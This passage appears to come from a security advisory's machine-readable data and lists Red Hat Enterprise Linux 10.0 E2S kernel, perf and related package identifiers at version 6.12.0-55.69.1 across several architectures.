"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
